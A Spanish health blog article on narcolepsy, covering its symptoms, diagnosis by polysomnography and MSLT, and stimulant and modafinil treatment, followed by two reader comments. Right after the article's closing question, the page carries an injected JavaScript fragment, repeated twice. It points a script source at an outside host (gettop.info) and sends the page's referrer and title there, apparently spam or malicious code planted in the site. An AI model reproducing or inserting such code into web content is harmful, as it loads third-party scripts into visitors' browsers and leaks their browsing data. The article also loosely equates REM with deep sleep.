Salud y belleza » Bienestar, Enfermedades, Salud

NARCOLEPSIA: UNA ENFERMEDAD OCULTA EN EL SUEÑO.

2 Comentarios

narcolepsiaSe trata de un trastorno del sueño, también conocida como el síndrome de Gelineau, se caracteriza por una presencia excesiva de sueño durante el día. En la actualidad presenta la segunda causa de la somnolencia diurna excesiva diagnosticada por los centros de sueño. Sus síntomas son:

  • Excesiva somnolencia diurna
  • Cataplejía, se trata de debilidad muscular acompañado de emociones. Por lo general las rodillas del paciente se doblan y aparecen risas, llantos o algún tipo de emoción.
  • Alucinaciones hipnagógicas, los pacientes tiene alucinaciones auditivas o visuales mientras duermen.
  • Parálisis del sueño. El paciente se encuentra paralizado durante unos minutos sobre todo al conciliar el sueño o al despertar.

Estos síntomas aparecen en los pacientes de forma variable. Cada paciente tiene su porcentaje en mayor o menor medida, no es para todos igual.

La edad típica de inicio de esta enfermedad es a partir de los 20 años y los antecedentes familiares son decisivos a la hora de hacer un diagnóstico acertado: cuando los síntomas de la cataplejía son leves se suele realizar una polisomnografía nocturna, seguida por la prueba de latencia múltiple del sueño (MSLT), después se comprueba la anormalidad de la fase del sueño REM en los primeros diez minutos del comienzo del sueño.

Lo que realmente ocurre en esta enfermedad es que los patrones del sueño NREM, (cuando una persona comienza a dormir) y el sueño REM, (sueño profundo),  se encuentran perturbados, es decir, el sueño REM ocurre al inicio en lugar de pasar por la fase NREM. Por lo tanto las consecuencias son que el sueño nocturno no incluye suficiente sueño profundo por lo que el cerebro busca compensar ese descanso profundo durante el día, cuando tienen una crisis se despiertan rápidamente y se pueden encontrar desorientados, los sueños se viven de manera muy intensas y en la gran mayoría de los casos se recuerdan. Un narcoléptico puede ir andando por la calle, quedarse dormido y seguir andando por inercia siempre y cuando no le afecte la fase de cataplejía.

Su tratamiento es sintomático, es decir, que alivia pero no cura. Se alivia con estimulantes como puede ser el metilfenidato y cuando este es ineficaz se usan dextroanfetamina y la metanfetamina de manera muy controlada. Recientemente se ha comprobado que existe un compuesto con menores efectos secundarios que los anteriores llamado modafinilo y que causa buenos resultados.

Está comprobado que no se suele detectar la enfermedad de manera rápida, desde que aparecen los primeros síntomas hasta que se diagnostica puede pasar una media de 14 años, por lo que es una enfermedad que causa un gran impacto dramático en su desarrollo personal y profesional: cuando se diagnostica con certeza ya se tiene una vida personal y profesional formada.

¿Conoces algún caso relacionado con esta desconocida enfermedad?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

2 Comments »

  • norberto said:

    Buena información.a qué tipo de especialista se debe ir para diagnosticarla?
    ¡gracias!

  • marta said:

    Norberto, el diagnostico lo puede llevar a cabo un medico generalista, tu medico de cabecera. Eso si luego el te mandara a un Especialista clínico que trata Narcolepsia para el tratamiento.

    si tienes algún síntoma, te recomiendo que lo comentes ya con tu medico de cabecera o tu clinica (si tienes un seguro privado y beneficias de la sanidad privada).

    un saludo

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.